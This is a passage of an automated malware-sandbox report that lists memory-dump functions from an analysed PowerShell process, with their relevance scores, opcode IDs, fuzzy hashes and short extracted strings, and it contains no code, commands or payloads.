                                                                • Instruction Fuzzy Hash: E4D11874A00209EFDB15CF98D484A9DFBB2FF88310F258569E805AB365C775ED86CB90
                                                                Function 04A44AA8 Relevance: .3, Instructions: 329COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b7afe85a572bab80e2a811496c35ea771eade7be7b5cc06c0935a2bda5bb9a4e
                                                                • Instruction ID: cc78d236823e1b77a8be1c4387e3cf92b43c0e8cba8c527ebb863fc891141f65
                                                                • Opcode Fuzzy Hash: b7afe85a572bab80e2a811496c35ea771eade7be7b5cc06c0935a2bda5bb9a4e
                                                                • Instruction Fuzzy Hash: 39D12834A00218AFDB15CF98D584A9DFBB2FFC9310F298159E845AB365D735ED82CB90
                                                                Function 04A49180 Relevance: .3, Instructions: 323COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cadb4199cbb994de868df3f30fb42e69a4dffd3354f5a833973ebf2e14b75b75
                                                                • Instruction ID: 533bc63f52080cb156d0775f75c10dcc31e35cc945ad3b6a45cfe64ac67b8c58
                                                                • Opcode Fuzzy Hash: cadb4199cbb994de868df3f30fb42e69a4dffd3354f5a833973ebf2e14b75b75
                                                                • Instruction Fuzzy Hash: FDC1AD71A002089FDB14DFB4C584A9EBBBAFFC4310F158269E406AF265DB34ED59CB40
                                                                Function 04A4FA85 Relevance: .3, Instructions: 283COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3565642bae8ab6723ad5d85afcc682a50f741b2e5a554aea6e39f3b277743d18
                                                                • Instruction ID: 15e8eb5fa29834ed2ac54c117d78fc711bab8f2ce39d7cfd54f3241d312fb28f
                                                                • Opcode Fuzzy Hash: 3565642bae8ab6723ad5d85afcc682a50f741b2e5a554aea6e39f3b277743d18
                                                                • Instruction Fuzzy Hash: E6B17E70E00249CFDB10CFA8C9917DDBBF1AFC9314F249529E855EB294EB74A846CB81
                                                                Function 04A4EDD4 Relevance: .3, Instructions: 280COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4728faf83ca2eb3fe6c9e10eab3b0219746143a7bdcc0e353b1cf807c537c29a
                                                                • Instruction ID: 5aef14384118b55cc391fff7bf424845eaeeaeb4b10e600e625fbfcfcad638e6
                                                                • Opcode Fuzzy Hash: 4728faf83ca2eb3fe6c9e10eab3b0219746143a7bdcc0e353b1cf807c537c29a
                                                                • Instruction Fuzzy Hash: 70B14D70E00209DFDB10CFA9C9857EEBBF1BFC8314F148529E815AB294EB74A945CB91
                                                                Function 04A4FAAD Relevance: .3, Instructions: 262COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0524dcc20fe0d979828a44b5e826484df7d16e1946d6b8c674bbc2f958e20f64
                                                                • Instruction ID: 2e730a04e04de03adfaf195f57fee6e3efc0933db32a636a1e46055abc03c5df
                                                                • Opcode Fuzzy Hash: 0524dcc20fe0d979828a44b5e826484df7d16e1946d6b8c674bbc2f958e20f64
                                                                • Instruction Fuzzy Hash: 6CB16D70E00209DFDB10CFA9C99579DBBF1AFC9314F149529E815EB298EB74A846CB81
                                                                Function 04A489E8 Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2585a24ae1632efb7945cd7c6aae13798f28a888175de45cce7301ad27c5af75
                                                                • Instruction ID: adf178c5144e35a6bdbcff4d24b85d758a41e878e71d3d908c6b1919c474d9e6
                                                                • Opcode Fuzzy Hash: 2585a24ae1632efb7945cd7c6aae13798f28a888175de45cce7301ad27c5af75
                                                                • Instruction Fuzzy Hash: EB817D34A012449FCB15DF78D4849ADBBF2FF89310F1984A9E445AB362D739EC86CB50
                                                                Function 04A49948 Relevance: .2, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1136b248e642f4067ccb5647601c7946faeacde25ecf451c4f5e8c93fdbd9831
                                                                • Instruction ID: 96e4f629de47eada908d221d14a33a0b65664be6167fc63bb2eb58eda1c1c147
                                                                • Opcode Fuzzy Hash: 1136b248e642f4067ccb5647601c7946faeacde25ecf451c4f5e8c93fdbd9831
                                                                • Instruction Fuzzy Hash: 3571AD70A012059FCB14DF78C880A9EBBF6FFC4314F188669E419EB695DB74AC46CB90
                                                                Function 04A49AB6 Relevance: .2, Instructions: 188COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201123ca20557de0d6340497476910a53c3ca49b3272d4643d466d16a4a025bb
                                                                • Instruction ID: cabf0468855389c12f79aff61ed5975771f38b143d9593bad5646cd456fb04f2
                                                                • Opcode Fuzzy Hash: 201123ca20557de0d6340497476910a53c3ca49b3272d4643d466d16a4a025bb
                                                                • Instruction Fuzzy Hash: 79717AB0E00258DFDB24DFB4C584AAEBBF6BFC8304F148529D415AB2A4DB74AC46CB50
                                                                Function 04A4F428 Relevance: .2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f6817c7a82743c79a5cd1f15805f233c107730f35d38a5ab2bfb8034111585c
                                                                • Instruction ID: 4c66f9dd07ccecdb92567be86fb0c0784f17f2292de883f24aade400d9b0fdf2
                                                                • Opcode Fuzzy Hash: 2f6817c7a82743c79a5cd1f15805f233c107730f35d38a5ab2bfb8034111585c
                                                                • Instruction Fuzzy Hash: 7F714AB0E00249DFDB10CFA9C98579EBBF2AFC8314F149129E415AB264EB74A841CF95
                                                                Function 04A4F41C Relevance: .2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 34223713a3712f95283862b11f5344a9aafaad39f5c9d4f413fa7e14a64aaf40
                                                                • Instruction ID: 9865c1341e61574a7bd4eb45a45a5b1f9ae81091a4f3a5718f1a6bf395df9e06
                                                                • Opcode Fuzzy Hash: 34223713a3712f95283862b11f5344a9aafaad39f5c9d4f413fa7e14a64aaf40
                                                                • Instruction Fuzzy Hash: BD714BB0E00249DFDB10CFA9C98579EFBF2AFC8314F149129E415AB264EB74A841CF95
                                                                Function 077FA5AD Relevance: .1, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e01e9ca67aabe6c2ad368fd2bb862fbaca2c28f76569362c9834175e3fb0f5e1
                                                                • Instruction ID: c7359912ca6412c6255ea50ff2b6d69d3083fca14fa2a63cd5f444a1156548ba
                                                                • Opcode Fuzzy Hash: e01e9ca67aabe6c2ad368fd2bb862fbaca2c28f76569362c9834175e3fb0f5e1
                                                                • Instruction Fuzzy Hash: 024129F1A10215DFCB218E248641E66BBB2AB87294F1AC4A6DA0C9F351D736D845CBB1
                                                                Function 04A496D9 Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 714c757f21a11d4c65f5f6ab789fe75d8515eccc426ac9592172448d5a74b033
                                                                • Instruction ID: 314c92a2f7075b0f5d294940aa88b5a725764f1516cc738d261d97f5db8c2454
                                                                • Opcode Fuzzy Hash: 714c757f21a11d4c65f5f6ab789fe75d8515eccc426ac9592172448d5a74b033
                                                                • Instruction Fuzzy Hash: D0418F71B002049FDB14EF78C998AAE7BB6EFC9750F184168E446EB7A5CB34AC45CB50
                                                                Function 04A43062 Relevance: .1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08d3d4c878265e935177e2badb10f40e897a74b6aaeece3ccbc1f70d8c36f69a
                                                                • Instruction ID: f68189336f5dd141b3d044f4f0707ee11ed4cf799ed013f22fef910697b7d733
                                                                • Opcode Fuzzy Hash: 08d3d4c878265e935177e2badb10f40e897a74b6aaeece3ccbc1f70d8c36f69a
                                                                • Instruction Fuzzy Hash: A24148B4A015059FCB06CF59C5949AEFBB1FF88310B2582A9D815AB368C736FC50CFA0
                                                                Function 077F802E Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 137e7c0a5fb6a57141fbc0efd7745fd55289718a65b7e31ea3d0ef24da505e76
                                                                • Instruction ID: ec35b828d39a6c47f60ca9620f90c6468d5b39b57867ea486da1b9ac8f188197
                                                                • Opcode Fuzzy Hash: 137e7c0a5fb6a57141fbc0efd7745fd55289718a65b7e31ea3d0ef24da505e76
                                                                • Instruction Fuzzy Hash: 5C31E7B0740218ABD714DB68C915F6EBBA3ABC4340F149428EA017F395CF76AC458B91
                                                                Function 077F0E18 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd518d8254961f6c9e165e88c827a38bcddfb2aead1c3993d6963d254f305b59
                                                                • Instruction ID: f52b4a9f24dd6ce3325b2b968d7ead7a5bebe9ebe5424711c3326869235a300f
                                                                • Opcode Fuzzy Hash: cd518d8254961f6c9e165e88c827a38bcddfb2aead1c3993d6963d254f305b59
                                                                • Instruction Fuzzy Hash: C72170B130031AABCB706979494073BBAC69BC5755F24883EE645DB3C3DE76D945C360
                                                                Function 04A4C3A8 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de9aea9bd1ae7c92521a1180f3ad59a4e48fcc81b022c119bca960e5f9a9f5fb
                                                                • Instruction ID: 6a28bf7c1ff2dab221d6bb26cacdf176bd0cc934dacdbc976ab4d1619fa90742
                                                                • Opcode Fuzzy Hash: de9aea9bd1ae7c92521a1180f3ad59a4e48fcc81b022c119bca960e5f9a9f5fb
                                                                • Instruction Fuzzy Hash: 34312734B012288FDB25DB64C9546EEB7B2AF89308F1145E9D509AB251DF36AE81CF81
                                                                Function 04A43985 Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e0bd01a0d1e743499f1c342ffe21bfa66ce7e7e0e850c1c06d1631b39033016
                                                                • Instruction ID: 2d497db4e6549c5f6f11623d79bcdec5fc83e4b209cea566a0d2f816e555dbbf
                                                                • Opcode Fuzzy Hash: 2e0bd01a0d1e743499f1c342ffe21bfa66ce7e7e0e850c1c06d1631b39033016
                                                                • Instruction Fuzzy Hash: F3316F74A052459FCB01CF5DC8909AEFBB1FF89310B1581AAD849EB7A2C735EC41CBA1
                                                                Function 077F0DFD Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 845cec9956405d2e0d725e38e2ba0bff9bd470a7e328e8a5352f2a960b8f395d
                                                                • Instruction ID: 5641cff990728a180906e8f29b993ceed0cc5c6fd2f90cabc968ad08d35a6d69
                                                                • Opcode Fuzzy Hash: 845cec9956405d2e0d725e38e2ba0bff9bd470a7e328e8a5352f2a960b8f395d
                                                                • Instruction Fuzzy Hash: D5218BF13083C96BDB611A754A107377F965F86744F2C886AAA44DF3C3DA7AD988C321
                                                                Function 077F0C08 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45f8f0062eede5df12418b6485d710b442a70ba28d56c3ab645bfc47f8c7109f
                                                                • Instruction ID: 618b973c2e0ab659d994e33b20610bf3aef1493d0f113cc8b7e5d54df1dfff61
                                                                • Opcode Fuzzy Hash: 45f8f0062eede5df12418b6485d710b442a70ba28d56c3ab645bfc47f8c7109f
                                                                • Instruction Fuzzy Hash: 6B01F77631031A8BC7649D6AD5005BBB7DADBC1662F14C83FD699C7352D632C845C760
                                                                Function 04A4F0CB Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68fcabccd3de1675dccd15ef69a9629fe15142e27a7d2cfe31e8a2a3b1b1fa35
                                                                • Instruction ID: c752ac1cff555e80d7c5db03d5cb33df5f116e75d9e25d448abf2bf87a6c4ddf
                                                                • Opcode Fuzzy Hash: 68fcabccd3de1675dccd15ef69a9629fe15142e27a7d2cfe31e8a2a3b1b1fa35
                                                                • Instruction Fuzzy Hash: F2110A30D06149DFEF24DBA8DA887ECB771AFC131DF24242AE101B6190EB7468C9CB11

                                                                Non-executed Functions

                                                                Function 04A48860 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1969870460.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_4a40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1c2a30fd3b60e9984a6fb96441e2732e074ce5162a0643d06acb3c78abe6124
                                                                • Instruction ID: a9d90acf636c916961d9cc8c5c031a463e982e4ca71668bdb6cb9ffd653f837d
                                                                • Opcode Fuzzy Hash: f1c2a30fd3b60e9984a6fb96441e2732e074ce5162a0643d06acb3c78abe6124
                                                                • Instruction Fuzzy Hash: F63168747046558FC755DB39C9848AEBBF6FF9A20031445AAE042CB772DA70ED09CB90
                                                                Function 077FC2B0 Relevance: 14.1, Strings: 11, Instructions: 371COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                • API String ID: 0-1234622266
                                                                • Opcode ID: b17ef439d18a1699c6160aa8fd9fcdb7e6082fbc93a4ad3062721690693a58e8
                                                                • Instruction ID: 8ee91bba018631709f4b4458c120f94cfd3fe65f661927a3365342f933933499
                                                                • Opcode Fuzzy Hash: b17ef439d18a1699c6160aa8fd9fcdb7e6082fbc93a4ad3062721690693a58e8
                                                                • Instruction Fuzzy Hash: EED119B171420DDFCB2A9F28C6046BA7BA2AF85390F24C87AD615CB351DB35D845C7B1
                                                                Function 077F2548 Relevance: 12.8, Strings: 10, Instructions: 303COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                • API String ID: 0-3986695248
                                                                • Opcode ID: ed83f235d43801977c4be001821f9694830ce2e7b33b4999b559f7453521cec3
                                                                • Instruction ID: 3fd936d6b698fbb8554057d3edb13531642357fcde35e5681ab3862f34c002cc
                                                                • Opcode Fuzzy Hash: ed83f235d43801977c4be001821f9694830ce2e7b33b4999b559f7453521cec3
                                                                • Instruction Fuzzy Hash: 3DA13CB17053568FDB254A298A5027E7BE5BF81290F2488BADA05CB393DF35CC45C7A1
                                                                Function 077FD754 Relevance: 11.5, Strings: 9, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$84!l$84!l$tPkq$tPkq$$kq$(qq$(qq$(qq
                                                                • API String ID: 0-2945224972
                                                                • Opcode ID: 4d26f556dd632b420b64f63a0498655b71953fcad371ce28312673d2c913c2eb
                                                                • Instruction ID: 19351e0b46f926d80fdc3b0b40d2b4ac75b3131e060085cdb5c1e94640ff529b
                                                                • Opcode Fuzzy Hash: 4d26f556dd632b420b64f63a0498655b71953fcad371ce28312673d2c913c2eb
                                                                • Instruction Fuzzy Hash: BB71C7B0705206DFDB34CE49C664BAABBB2BF85390F1984A5EA046B395C771DC81CB61
                                                                Function 077F1EB8 Relevance: 10.4, Strings: 8, Instructions: 397COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$t~~q$$kq$$kq$$kq
                                                                • API String ID: 0-1562974437
                                                                • Opcode ID: 11fab482ee46c5626eae23f41759ce77e5f3a021336f7c9954a914f5aebe1ee7
                                                                • Instruction ID: a71a1d6558bd97f3ec45e745781e160753383b95d37b12e23b58a9c33ba12951
                                                                • Opcode Fuzzy Hash: 11fab482ee46c5626eae23f41759ce77e5f3a021336f7c9954a914f5aebe1ee7
                                                                • Instruction Fuzzy Hash: 40C139B1B0021A9FCB249F799A006AFBBE2BFC5250F24887AD645CB352DF31D945C791
                                                                Function 077FEA28 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (f#l$(f#l$(f#l$(f#l$4'kq$4'kq$4 l$4 l
                                                                • API String ID: 0-1956336791
                                                                • Opcode ID: aa668e805104fa2eeb10baddbaef51c977726cb06e871af66dd5b8f45a885e1e
                                                                • Instruction ID: a1d7f674f8bd6b5fd44c8cde3333f616a67a1d3d36805347ea593d479ee6d211
                                                                • Opcode Fuzzy Hash: aa668e805104fa2eeb10baddbaef51c977726cb06e871af66dd5b8f45a885e1e
                                                                • Instruction Fuzzy Hash: 6661D4F0B00209DFCB14CB58C655A6ABBE3BF85350F288569D905AB364CB76EC45CB91
                                                                Function 077FD404 Relevance: 10.2, Strings: 8, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$84!l$TQpq$TQpq$tPkq$$kq$$kq$$kq
                                                                • API String ID: 0-1639484858
                                                                • Opcode ID: d38fd1b17dcfacfd34b4291f5e4434bc026f63bec1543caf86dd12c8069db9dd
                                                                • Instruction ID: 95c08899b53f0c9e6639dc2666cf43118fcbc89c5ce9b25639fe6db7c54a9eb5
                                                                • Opcode Fuzzy Hash: d38fd1b17dcfacfd34b4291f5e4434bc026f63bec1543caf86dd12c8069db9dd
                                                                • Instruction Fuzzy Hash: 8251D1B1704206DFCB348E14C724766B7A2BF453D9F1888A6EA088B391C775E844CB91
                                                                Function 077F9C48 Relevance: 9.2, Strings: 7, Instructions: 487COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq
                                                                • API String ID: 0-801068408
                                                                • Opcode ID: 22f73f0268b7a54d8814084a229c15821ca96bb01e479a4e4ab5e4dca2030a9e
                                                                • Instruction ID: 9f7f294102d84b2fd01bc5c3391590f1de5098e40c92fb195cf870e353ea3899
                                                                • Opcode Fuzzy Hash: 22f73f0268b7a54d8814084a229c15821ca96bb01e479a4e4ab5e4dca2030a9e
                                                                • Instruction Fuzzy Hash: E7F129B27042158FC7259B7895007AAFBE6AFC6260F15C87BDB09CB351DB32D845CB91
                                                                Function 077FCED1 Relevance: 8.9, Strings: 7, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$84!l$d%qq$d%qq$d%qq$tPkq$$kq
                                                                • API String ID: 0-4258617383
                                                                • Opcode ID: d615ff60aec9ccc7031d2d6df88a45eb67dfc2550205c3a7b63ff7e54b0044a3
                                                                • Instruction ID: 0fe718e21b4e0ba47c75970c0972e7636138df99f1100464136a8ece9d24617f
                                                                • Opcode Fuzzy Hash: d615ff60aec9ccc7031d2d6df88a45eb67dfc2550205c3a7b63ff7e54b0044a3
                                                                • Instruction Fuzzy Hash: 3451D7F1710209DFCB358E24CA60B6ABBF2AF45390F298896DA059B791D731DC85CB61
                                                                Function 077FD016 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'kq$84!l$d%qq$d%qq$d%qq$tPkq
                                                                • API String ID: 0-2720990063
                                                                • Opcode ID: 72770ee37541270233960c2a3a301b3397011cf60bbd1e5d8151f33bd026a8e3
                                                                • Instruction ID: 712fbfbe3189ffddc2a5e4c0b21d9b365d1d5d7b6cecb2ea88e09be5d0a14a0b
                                                                • Opcode Fuzzy Hash: 72770ee37541270233960c2a3a301b3397011cf60bbd1e5d8151f33bd026a8e3
                                                                • Instruction Fuzzy Hash: 8D31B1B1B00119DFCB34DF68C560A5AFBA2FB887A0F258955EA05AB354C731DC41CB91
                                                                Function 077FC780 Relevance: 5.5, Strings: 4, Instructions: 479COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1990095072.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_77f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (okq$(okq$(okq$(okq
                                                                • API String ID: 0-1817140900
                                                                • Opcode ID: 4e087b51e3f1d687f3a34c31a0967ffcc11ea22bedc7905bdd7152ad2127061c
                                                                • Instruction ID: 50e2d6f7628a69440d491e549b9e13872d110fe5372eb4f2ccec3eb10e2bd647
